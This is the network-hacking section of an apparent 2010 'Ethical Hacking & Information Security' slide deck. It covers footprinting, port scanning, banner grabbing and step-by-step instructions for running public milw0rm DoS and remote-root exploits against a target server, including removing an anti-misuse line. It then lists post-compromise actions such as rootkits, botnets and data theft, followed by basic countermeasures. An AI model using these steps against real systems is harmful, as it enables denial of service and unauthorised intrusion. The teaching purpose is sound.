AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Footprinting
Footprinting• To hack a system the hacker must first know everything there is to know about it
• Gathering information about a computer system and the companies it belongs to
Footprinting Steps• A hacker would start gathering information on the targets website. Things to look for are e-mails
and names
• Get the IP address of the website
• Ping the server to see if it is up and running
• Do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in thetarget website
• You see the company e-mails, address, names, when the domain was created, when the domainexpires, the domain name servers, and more!
• A hacker can also take advantage of search engines to search sites for data
• ”site : www.the− target− site.com” this will display every page that Google has ofthe website
• ”site : www.the− target− site.comemail” will list several emails that arepublished on the website
• ”inurl : robots.txt” would look for a page called robots.txt, which displays all thedirectories and pages on the website that they wish to keep anonymous from the searchengine spiders
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 45 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Port Scanning
Port Scanning• To detect the port’s listening services on server’s open ports so as to detect the vulnerabilities
• The Nmap Security Scanner is available for both Mac and Windows users:http://nmap.org/download.html
Port Scanning Steps• Choose a target and place it in the target box
• choose the ”Profile”
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 46 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Port Scanning
Port Scanning Steps• A sample scan result may look like
• List of some of the most popular ports/services on the internet
• the hacker needs to also find out what operating system the server is running (Visiting a non-existentpage gives 404 error page which shows the OS)
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 47 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Banner Grabbing
Banner Grabbing• To find out the software and its version,which is needed to search for vulnerability
Banner Grabbing Steps• Telnet into service port To figure out what software and version of the service
• If you are using Windows Vista, then telnet is not installed by default, Use control panel - Programsand Features - Turn Windows features on or off - Telnet Client to install
• If you found port 21 (ie ftp) open, then telnet www.targetsite.com 21 to find out FTP software
• Nmap’s full version detection option to get this information, if telnet doesn’t work
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 48 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Searching for Vulnerabilities
Searching for Vulnerabilities• Search a couple vulnerability databases for an exploit
• If there’s an exploit available, run it against the server and take complete control
• Popular exploit databases are Milw0rm, SecurityFocus, osvdb
• If there isn’t any, you can move onto another open port and try again on a different service.
Alternatively develop a ”0-day” exploit
• No one knows about the vulnerability, hundreds of websites can be hacked before thevulnerability is discovered and patched
• The hacker could sell the vulnerability for thousands of dollars• It shows that the hacker is very skillful and raises his ranks in the hacker community
Attacks used against discovered vulnerabilities• Denial-of-Service(DoS) :Send a flood of information to the target server causing it to use up all of
its resources, and in return pushing it offline, or deny requests to others
• Buffer Overflow(BoF) :The extra information overflows into other buffers causing them to beoverwritten with malicious code created by the hacker. Once this code is executed, the hacker canreceive full control of the server
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 49 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Searching for Vulnerabilities
Types of Exploits• Local Exploit :You must first have access and privileges on the machine. Local exploits are usually
used to escalate ones privileges to admin or root
• Remote Exploit :it isn’t run locally, but launched from anywhere across the internet
• A hacker usually has to use a combination of both remote and local exploits to gain full control of asystem. For example, the hacker may have been able to gain regular privileges with a remote exploitattack, and then be able to escalate to root privileges with the help of a local exploit
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 50 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Penetrating
Penetrating• Running the exploits against the target and penetrating the server
DOS php exploit: PHP http://milw0rm.com/exploits/2901• Install PHP onto your computer. WAMP is a free web server that comes with PHP
• Paste the PHP exploit into notepad or any word processor and save it as ”exploit.php”
• On line 13 of this exploit you will see: $address = gethostbyname(’192.168.1.3’); edit here the IPaddress of the target
• Save this edited file into the PHP directory on your server that contains the PHP executable file. InWAMP the directory would be C:\wamp\bin\php\php5.2.5
• To run it simply type in ”php exploit.php” and hit enter
• When skilled hackers create exploits, they sometimes insert mistakes or extra code so that scriptkiddies with no programming knowledge wouldn’t be able to use them
• At line 18 of this exploit , we $junk.=”../../../sun-tzu/../../../sun-tzu/../../../sun-tzu”; Just removethis line and error will disappear
• a DoS attack will be launched; the target website up until you exit the command screen
• The site will begin to lag and it’ll take a long time to load pages. Eventually the server may go downcompletely
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 51 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Penetrating
DOS perl exploit: http://milw0rm.com/exploits/6581• Download and install the appropriate version of ActivePerl
• Edit the options like the target server and others as needed. Then save the file as ”exploit.pl”. Asyou can see Pearl exploits begin with ”!/usr/bin/perl”
• Run the exploit by typing: ”perl exploit.pl”
Python, C/C++ on Linux,• Python exploit: http://milw0rm.com/exploits/3523
• Most C/C++ exploit code is made to be compiled in Linux
• Save the remote root exploit http://milw0rm.com/exploits/269 as ”exploit.c”
• Install a development package of all the libraries and headers needed to compile C/C++ scripts bysudo apt-get install build-essential
• Once the hacker ran the script against a vulnerable server running BeroFTPD 1.3.4 and the scriptworked, the hacker would now have root access to the server
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 52 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Penetrating
C/C++ on Windows• To run in Windows, you can use Cygwin
• Cygwin is a Linux-like environment that runs in Windows and acts as a Linux emulation layer,allowing you to run Linux scripts in windows
• Download Cygwin from http://www.cygwin.com/
• Using the same exploit as the last example, save and move it into the ”C:\cygwin” directory as”exploit.c”
• In ”C:\cygwin” directory do ”gcc exploit.c -o exploit”
• Run the file ”exploit.exe” simply type simply type ”./exploit”
• You get the root access to the target computer
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 53 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Techniques
Penetrating
root accessOnce you get root access , you can do
• Add yourself as a permanent user for future access
• Add the server into your botnet collection so he could use it as a weapon against other servers
• Use it as a proxy to hack other websites
• Install a rootkit so he can come back and have full control over the server when needed
• Constantly steel information as it comes
• Use the system to store illegal data
• Deface the website and sometimes the hacker will delete everything off of the server
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 54 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking Countermeasures
Network Hacking
Countermeasures
• Keep all your software up to date
• There will always be new vulnerabilities coming out, and your responsibility is to patch themimmediately after a patch comes out
• Implement a firewall. This will keep most of the bad data out and good data in
• Install anti-virus software
• Scan your system with a vulnerability scanner. This may reveal possible vulnerabilities in your system
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 55 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
References
References
References
• http://www.learn-how-to-hack.net
• http://www.MrCracker.com
• http://hackthisway.com
Presentation available at
http://akdhamija.webs.com/
For any Clarification, mail me at
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 56 / 56